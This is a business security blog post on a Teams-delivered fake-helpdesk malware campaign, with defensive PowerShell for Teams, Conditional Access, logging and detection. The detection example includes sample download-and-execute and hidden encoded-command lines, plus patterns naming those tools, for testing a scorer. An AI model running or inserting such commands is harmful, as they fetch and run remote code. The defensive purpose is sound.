Microsoft Teams is central to daily communication for millions of UK businesses. But now security researchers at Google’s Mandiant team have identified a threat group known as UNC6692, active since late December 2025. The group is using Microsoft Teams as the delivery channel for a custom malware suite called “Snow.”
This is an ongoing campaign that has expanded in scale and become more targeted throughout early 2026. Any organisation using Teams should understand how this campaign works and what it means in practice.
The Snow campaign is a structured social engineering attack built around exploiting employee trust in familiar tools and internal IT processes. The attack typically unfolds in three stages.
Attackers begin by flooding a target’s inbox with thousands of emails, a tactic known as email bombing. The objective is to overwhelm the user, disrupt normal work, and create urgency.
While the target is distracted, a message arrives via Microsoft Teams. It appears to come from an internal IT helpdesk agent offering assistance. The attacker directs the employee to click a link and install what is described as a “Mailbox Repair and Sync Utility.”
The so-called repair utility installs a malicious script that deploys the Snow malware toolkit. This operates silently, allowing attackers to steal credentials, move through the network, and establish control without raising obvious alarms.
This campaign is particularly concerning because of its targeting and delivery method.
Between March and April 2026, 77% of observed incidents targeted senior employees. These individuals typically have broader access and higher levels of trust within an organisation. Compromising one account can open multiple pathways deeper into the network. This reflects a deliberate strategy rather than random targeting.
There is also a wider shift in attack patterns. Email is no longer the primary entry point. Collaboration platforms such as Teams and Slack are increasingly being used instead. Many organisations have invested heavily in email security but have not applied the same level of control to these tools.
The Snow campaign exploits that gap by using a trusted platform during a moment of stress to deliver malware designed to avoid detection.
For UK businesses, there is an additional regulatory dimension. A breach of this kind may trigger reporting obligations under UK GDPR Article 33, requiring notification to the ICO within 72 hours. The operational disruption, financial cost, and reputational damage of a domain-level compromise can be severe, and response time is limited.
Although the attack is sophisticated, it is not unstoppable. Several practical measures can significantly reduce exposure.
Teams often allows external users to message employees by default. Restrict this to a verified list of approved domains wherever possible. If there is no business need for external contact, disable it.
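The following is an added example, not code from the original post or from Mandiant, showing how the restriction above can be applied at tenant level with the MicrosoftTeams PowerShell module. It assumes the module is installed, the signed-in account holds the Teams Administrator role, and the two domains in `$approvedDomains` are placeholders for the organisation's own approved partners.

```powershell
# Added example (not from the original post): restrict Teams external access to an
# allow-list of approved domains, or disable it entirely when there is no business need.
# Assumptions: MicrosoftTeams module installed; Teams Administrator role;
# 'partner-a.example' and 'partner-b.example' are placeholder domains.

Connect-MicrosoftTeams

# Record the current state first so the change can be audited and reversed.
$before = Get-CsTenantFederationConfiguration
"Before: AllowFederatedUsers={0}; AllowTeamsConsumer={1}; AllowTeamsConsumerInbound={2}" -f `
    $before.AllowFederatedUsers, $before.AllowTeamsConsumer, $before.AllowTeamsConsumerInbound

# Empty this list to switch off external access completely.
$approvedDomains = @('partner-a.example', 'partner-b.example')

if ($approvedDomains.Count -gt 0) {
    # Keep external access on, but only for the listed domains, and block
    # unmanaged (personal) Teams accounts, which are not tied to any organisation.
    Set-CsTenantFederationConfiguration `
        -AllowFederatedUsers $true `
        -AllowedDomainsAsAList $approvedDomains `
        -AllowPublicUsers $false `
        -AllowTeamsConsumer $false `
        -AllowTeamsConsumerInbound $false
} else {
    # No business need for external contact: disable it.
    Set-CsTenantFederationConfiguration `
        -AllowFederatedUsers $false `
        -AllowPublicUsers $false `
        -AllowTeamsConsumer $false `
        -AllowTeamsConsumerInbound $false
}

# Verify the result. AllowedDomains should list only the approved domains
# (or be irrelevant when AllowFederatedUsers is $false).
$after = Get-CsTenantFederationConfiguration
"After: AllowFederatedUsers={0}; AllowTeamsConsumer={1}; AllowTeamsConsumerInbound={2}" -f `
    $after.AllowFederatedUsers, $after.AllowTeamsConsumer, $after.AllowTeamsConsumerInbound
$after.AllowedDomains
```

This is the tenant-wide setting; external access can additionally be scoped per user with `Grant-CsExternalAccessPolicy`, which is useful when only a small group genuinely needs to talk to partners. Re-run the verification block after any admin centre change, because a later edit in the portal silently replaces the allow-list.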
Cyber Essentials provides a strong security baseline for UK organisations. Controls around access management, patching, malware protection, and secure configuration directly reduce the likelihood of attacks succeeding. For many businesses, it is one of the most practical starting points for improving resilience.
Conditional Access policies help ensure that only authorised users, devices, and locations can access Microsoft 365 services. Even if credentials are stolen through a campaign like Snow, Conditional Access can prevent attackers from logging in or moving further into the environment.
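As an added example (not code from the original post or from Microsoft), the following creates a Conditional Access policy with the Microsoft Graph PowerShell SDK that requires both multi-factor authentication and a compliant device for all users and all cloud apps. It starts in report-only mode so the impact can be reviewed in the sign-in logs before enforcement. It assumes the Microsoft.Graph module is installed, the admin has the Policy.ReadWrite.ConditionalAccess permission, and `$breakGlassObjectId` is a placeholder for the tenant's emergency-access account.

```powershell
# Added example (not from the original post): report-only Conditional Access policy
# requiring MFA and a compliant device. Assumptions: Microsoft.Graph module installed;
# Policy.ReadWrite.ConditionalAccess granted; the object ID below is a placeholder.

Connect-MgGraph -Scopes 'Policy.ReadWrite.ConditionalAccess', 'Policy.Read.All'

$breakGlassObjectId = '00000000-0000-0000-0000-000000000000'   # placeholder, replace

$policy = @{
    displayName = 'Require MFA and compliant device (report-only pilot)'
    # Report-only evaluates the policy and logs the outcome without blocking anyone.
    state       = 'enabledForReportingButNotEnforced'
    conditions  = @{
        users = @{
            includeUsers = @('All')
            excludeUsers = @($breakGlassObjectId)   # never lock out emergency access
        }
        applications = @{
            includeApplications = @('All')
        }
        clientAppTypes = @('all')
    }
    grantControls = @{
        operator        = 'AND'                     # both controls must be satisfied
        builtInControls = @('mfa', 'compliantDevice')
    }
}

$created = New-MgIdentityConditionalAccessPolicy -BodyParameter $policy
"Created policy {0} (state: {1})" -f $created.Id, $created.State

# Check: list every policy with its state, so a report-only or disabled policy
# is not mistaken for an enforced one during an incident review.
Get-MgIdentityConditionalAccessPolicy |
    Select-Object DisplayName, State |
    Format-Table -AutoSize
```

Once the report-only results show no unexpected blocks, switch the policy on with `Update-MgIdentityConditionalAccessPolicy -ConditionalAccessPolicyId $created.Id -BodyParameter @{ state = 'enabled' }`. With the device requirement in place, a credential captured through a fake helpdesk interaction does not by itself grant a sign-in from an attacker's machine.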
Employees are the first line of defence against social engineering attacks. Training should help staff recognise suspicious behaviour such as email bombing, fake IT support requests, and unexpected software installation prompts. Staff should feel confident verifying requests before taking action.
Employees should follow a clear process to confirm the identity of anyone requesting software installation or link clicks. This applies across Teams, phone, and email. Legitimate IT staff will expect verification.
Snow relies on PowerShell scripts to execute. Tightening execution policies and limiting which scripts can run adds an important layer of defence.
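The following is an added example, not code from the original post, of tightening script execution on a Windows endpoint and turning on the PowerShell logging that later detection depends on. It assumes an elevated session and sets machine-wide values directly in the policy registry keys; in a domain the same settings would normally be delivered by Group Policy.

```powershell
# Added example (not from the original post): restrict PowerShell script execution
# and enable script block and module logging. Run elevated. Assumption: local
# machine policy; in a domain, push the same values through Group Policy.

# 1. Require scripts to be signed by a trusted publisher. Execution policy is a
#    guardrail against accidental or casual execution, not a security boundary
#    (it can be overridden per process), so pair it with application control
#    such as AppLocker or WDAC for scripts.
Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine -Force

# 2. Script block logging: every block that runs is written as event 4104 in
#    Microsoft-Windows-PowerShell/Operational, including the decoded content of
#    encoded commands, which is what makes hidden scripts visible to analysts.
$sbl = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
New-Item -Path $sbl -Force | Out-Null
Set-ItemProperty -Path $sbl -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord

# 3. Module logging for all modules: event 4103 records pipeline execution
#    details (which cmdlets ran with which parameters).
$ml = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'
New-Item -Path "$ml\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path $ml -Name 'EnableModuleLogging' -Value 1 -Type DWord
Set-ItemProperty -Path "$ml\ModuleNames" -Name '*' -Value '*' -Type String

# 4. Verify the effective policy at every scope and the logging switches.
Get-ExecutionPolicy -List
Get-ItemProperty -Path $sbl | Select-Object EnableScriptBlockLogging
Get-ItemProperty -Path $ml  | Select-Object EnableModuleLogging
```

`Get-ExecutionPolicy -List` matters because a more permissive policy at the Process or CurrentUser scope takes precedence over LocalMachine; if the list shows anything other than AllSigned or RemoteSigned at those scopes, the machine-wide setting is not what is actually in force.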
A sudden influx of emails should be treated as suspicious. Employees should be trained to report it rather than seeking quick fixes, especially from unsolicited contacts.
Identity Threat Detection and Response (ITDR) and Endpoint Detection and Response (EDR) tools provide visibility into suspicious activity across users and devices. These solutions can detect credential misuse, unusual authentication behaviour, lateral movement, and malware activity before attackers gain full control.
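To make the endpoint-side part of this concrete, here is an added example (not code from the original post, and not Snow-specific indicators, which the post does not list) that triages PowerShell script block events for the generic behaviours EDR tooling typically flags: encoded commands, download-and-execute cradles, hidden windows and policy bypass flags. It assumes script block logging is already enabled; a few constructed sample blocks are included so the scoring function can be exercised without a live log.

```powershell
# Added example (not from the original post): score PowerShell script blocks for
# generic suspicious patterns and surface high-scoring 4104 events.
# Assumptions: script block logging enabled; thresholds and weights are illustrative.

function Get-ScriptBlockRiskScore {
    param([Parameter(Mandatory)][string]$ScriptText)

    # Each pattern is a weak signal on its own; combinations raise the score.
    $indicators = @(
        @{ Name = 'EncodedCommand';   Pattern = '-(e|ec|enc|encodedcommand)\s';                 Weight = 3 }
        @{ Name = 'Base64Decode';     Pattern = 'FromBase64String';                             Weight = 2 }
        @{ Name = 'DownloadCradle';   Pattern = 'DownloadString|DownloadFile|Invoke-WebRequest'; Weight = 2 }
        @{ Name = 'InvokeExpression'; Pattern = 'Invoke-Expression|\biex\b';                    Weight = 2 }
        @{ Name = 'HiddenWindow';     Pattern = '-w(indowstyle)?\s+hidden';                     Weight = 1 }
        @{ Name = 'BypassPolicy';     Pattern = '-(ep|executionpolicy)\s+bypass';               Weight = 1 }
    )
    $score = 0
    $names = [System.Collections.Generic.List[string]]::new()
    foreach ($i in $indicators) {
        if ($ScriptText -match $i.Pattern) {   # -match is case-insensitive by default
            $score += $i.Weight
            $names.Add($i.Name)
        }
    }
    [pscustomobject]@{ Score = $score; Indicators = $names.ToArray() }
}

function Get-SuspiciousScriptBlocks {
    param([int]$Threshold = 4, [int]$MaxEvents = 500)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # In a 4104 event, Properties[2] holds the script block text.
            $text = [string]$_.Properties[2].Value
            $r = Get-ScriptBlockRiskScore -ScriptText $text
            if ($r.Score -ge $Threshold) {
                [pscustomobject]@{
                    Time       = $_.TimeCreated
                    Score      = $r.Score
                    Indicators = ($r.Indicators -join ',')
                    Snippet    = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

# Constructed sample blocks (not real captures) to exercise the scorer offline.
$samples = @(
    'Get-ChildItem C:\Users | Sort-Object Name',
    'powershell -w hidden -ep bypass -enc AAAAAAAAAAAAAAAA',
    'IEX (New-Object Net.WebClient).DownloadString("https://example.invalid/update.ps1")'
)
foreach ($s in $samples) {
    $r = Get-ScriptBlockRiskScore -ScriptText $s
    "{0,2}  {1,-35} {2}" -f $r.Score, ($r.Indicators -join ','), $s
}
# Expected scores for the three samples: 0, 5 and 4.

# Live triage against this machine's log (returns nothing if logging is off).
Get-SuspiciousScriptBlocks | Format-Table -AutoSize
```

The value of this is the combination with identity data: an ITDR platform correlates a high-scoring script block on a senior employee's device with that account's subsequent sign-ins and token use, which is where "credential misuse" becomes visible. On its own, the scorer is a starting point for tuning, not a verdict; legitimate admin tooling will occasionally trip the lower-weight patterns.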
Since attackers target senior staff, it is critical to limit and monitor privileged accounts. Strong authentication and access controls make lateral movement harder.
The Snow campaign reflects a broader trend in cyber threats. Attackers are focusing less on technical vulnerabilities and more on human behaviour and trusted platforms.
Organisations that treat cyber security as a one-time task are more vulnerable. Those that invest in ongoing awareness, appropriate controls, and continuous monitoring are better prepared to handle evolving threats.
If there is uncertainty about how well current defences would hold up against an attack like this, it is worth addressing that proactively.
A Cyber Security Assessment from Netmatters provides a clear view of current risks and a practical plan to address them. It offers straightforward insight into both technical exposure and operational realities, helping businesses make informed decisions without unnecessary pressure. Book your Cyber Security Assessment today.